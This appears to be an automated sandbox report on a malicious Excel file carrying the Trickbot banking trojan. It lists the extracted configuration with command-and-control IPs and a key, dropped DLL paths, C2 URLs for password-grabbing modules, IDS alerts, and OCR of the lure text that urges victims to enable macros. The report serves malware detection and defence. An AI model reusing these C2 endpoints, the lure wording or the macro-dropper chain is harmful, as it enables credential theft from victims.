Analysis Report SecuriteInfo.com.Heur.31681.20936

Source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp

Malware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net9", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll	ReversingLabs: Detection: 32%
Source: C:\Users\user\fndskfnds.dfm	ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Heur.31681.xls

ReversingLabs: Detection: 12%

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00068300 CryptAcquireContextW,
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180083634 CryptUnprotectData,

Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown

HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063B00 FindFirstFileW,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: netmouser[1].dll.0.dr

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then movzx edx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then movzx ecx, word ptr [eax+02h]
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec ecx
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov ebx, edx
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then call 000619E0h
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc ecx
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then cmp dword ptr [eax], ecx
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec edi
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc ebp

Source: global traffic

DNS query: name: deluciaspizza.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.22:49170 -> 188.18.7.133:447

May check the online IP address of the machine

Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.22:49170 -> 188.18.7.133:447

Source: Joe Sandbox View

IP Address: 103.102.220.50 103.102.220.50

Source: Joe Sandbox View

ASN Name: ROSTELECOM-ASRU ROSTELECOM-ASRU

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f

Source: global traffic

HTTP traffic detected: POST /net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------GRLZGARVGZREFNBNConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.102.220.50:443Content-Length: 282Cache-Control: no-cache

Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EF8415A.emf

Source: global traffic

HTTP traffic detected: GET /?format=text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.74.0Host: api.ipify.org

Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: deluciaspizza.com

Source: unknown

Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443
Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443Edge
Source: wermgr.exe, 00000005.00000002.2374629363.0000000031844000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443W6
Source: wermgr.exe, 00000005.00000003.2180328107.0000000031844000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443X6
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://115.241.244.185:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://177.84.63.252:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://185.119.120.213:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://189.195.96.238:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://190.89.3.117:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://36.95.27.243:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://5.202.120.150:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://83.220.115.230:443
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.c
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/in
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/14/NAT%20status/client%2
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/dpost/
Source: wermgr.exe, 00000005.00000002.2375741544.0000000033395000.00000004.00000001.sdmp, wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DEBG//
Source: wermgr.exe, 00000005.00000002.2375793924.000000003339B000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DPST//
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/VERS//
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabb64/k
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabc64/O
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown

HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

E-Banking Fraud:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4	Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start I ' ' ' 18 the decryption of
Source: Document image extraction number: 2	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3	Screenshot OCR: Enable Content
Source: Document image extraction number: 4	Screenshot OCR: Enable Editing
Source: Document image extraction number: 13	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document

Found Excel 4.0 Macro with suspicious formulas

Source: SecuriteInfo.com.Heur.31681.xls	Initial sample: CALL
Source: SecuriteInfo.com.Heur.31681.xls	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fndskfnds.dfm			Jump to dropped file

Source: C:\Windows\System32\wermgr.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00073410 NtDelayExecution,
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00067C30 NtQueryInformationProcess,
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007C8E0 NtQuerySystemInformation,CLSIDFromString,DuplicateHandle,HeapFree,

Source: C:\Windows\System32\wermgr.exe

File created: C:\Windows\system32\cn\

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062810
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00084030
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00076890
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007C8E0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00065D60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006D180
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006F600
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006CE60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000756D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00068300
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006BB10
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006EF30
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00065460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007E460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006A0A0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000684D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006ACD0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000838F0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063D20
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062530
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000611B0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006D5D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00077A10
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006AA20
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00082E50
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00071E60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006CA80
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006C2B0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000796C0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00080720
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00066F40
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000823F0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180011A74
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180016C20
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000FD48
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001AFC0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000BFE4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800110B4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800130E8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800020E8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800011DC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001822C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001D2C0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180020300
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180004320
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180008444
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001C4C8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180001574
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180003594
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800076B8
